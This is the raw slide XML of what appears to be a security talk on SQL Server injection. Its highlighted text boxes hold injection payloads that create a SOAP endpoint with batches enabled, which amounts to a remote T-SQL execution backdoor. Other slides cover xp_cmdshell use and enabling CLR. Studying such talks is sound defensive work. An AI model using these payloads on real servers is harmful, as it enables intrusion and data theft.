          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2438400"/>
            <a:ext cx="3784341" cy="3361318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5334000"/>
            <a:ext cx="8991600" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exec('CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ENDPOINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eepp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> STATE = STARTED AS HTTP (AUTHENTICATION = ( INTEGRATED ),PATH = ''/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql/demoo'',PORTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ( CLEAR ))FOR SOAP (WEBMETHOD ''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getServerVersion''(NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>demo_db.dbo.getServerVersion''),BATCHES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ENABLED,WSDL = DEFAULT)')--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="wsdl2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2743199"/>
            <a:ext cx="2819400" cy="2323505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1600200" y="2438400"/>
            <a:ext cx="685800" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">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2819400" y="4724400"/>
            <a:ext cx="1143000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="47625">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 name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="818727"/>
            <a:ext cx="3124200" cy="400473"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="818727"/>
            <a:ext cx="3048000" cy="400473"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="818727"/>
            <a:ext cx="2819400" cy="40047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sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="818727"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284887" y="818727"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="818727"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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funnprofit.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-134505" r="-134505"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7624073" y="152400"/>
            <a:ext cx="24616673" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5029200"/>
            <a:ext cx="8229600" cy="1676400"/>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The vector here is obvious: We wanted to build a function or proc. That would accept arbitrary input from SOAP, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>() it…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But Microsoft beat us to it…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Remote Exec (with feeling!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="4830763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We really needed to use the words AJAX and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> object to qualify as a web 2.0 talk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will still add XML, SOAP and a tool with no vowels in its name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>(watch for this!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Picture 7.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3886200"/>
            <a:ext cx="4267200" cy="225181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X-Platform Query Managers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Did you notice the methods </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VisualStudio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> extracted from the WSDL ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="5000"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MSDN: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>When BATCHES are ENABLED on an endpoint by using the T-SQL command, another SOAP method, called "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlbatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>," is implicitly exposed on the endpoint. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlbatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> method allows you to execute T-SQL statements via SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="web-ref.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2575203" y="2362200"/>
            <a:ext cx="4907993" cy="2499506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3810000"/>
            <a:ext cx="6988249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>getServerVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Sqlbatch(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BatchCommands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Parameters As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ArrayofParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>)</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hort-ep.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-36719" r="-36719"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-609600" y="76200"/>
            <a:ext cx="4048208" cy="2316162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="304800"/>
            <a:ext cx="6988249" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exec('CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ENDPOINT ep2 STATE=STARTED AS HTTP (AUTHENTICATION=(INTEGRATED),PATH = ''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>'',PORTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=(CLEAR))FOR SOAP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>BATCHES=ENABLED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)')--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="sp-created.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="1371600"/>
            <a:ext cx="3260331" cy="1809484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="perl-soap.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5065972" y="1905000"/>
            <a:ext cx="4001828" cy="2183667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="xp_cmd-soap.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4800600"/>
            <a:ext cx="8915400" cy="1783080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="4171527"/>
            <a:ext cx="3962400" cy="400473"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="4171527"/>
            <a:ext cx="2932372" cy="400473"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4171527"/>
            <a:ext cx="2209800" cy="40047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sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4171527"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284887" y="4171527"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="4171527"/>
            <a:ext cx="363313" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>3.</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CLR Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The thing that made </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>squeeza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> difficult to write in ‘07 was mainly T-SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T-SQL is Turing Complete but when trying to extract data from a network via encoded DNS packets or timing it starts to creak a little.. (we did it, but lost a lot of hair in the process)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft to the rescue (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>): “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Microsoft SQL Server 2005 significantly enhances the database programming model by hosting the Microsoft .NET Framework 2.0 Common Language Runtime (CLR). This enables developers to write procedures, triggers, and functions in any of the CLR languages, particularly Microsoft Visual C# .NET, Microsoft Visual Basic .NET, and Microsoft Visual C++. This also allows developers to extend the database with new types and aggregates.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Huh ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turned off by default… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember slide on in-band signals &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sp_configure(clr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
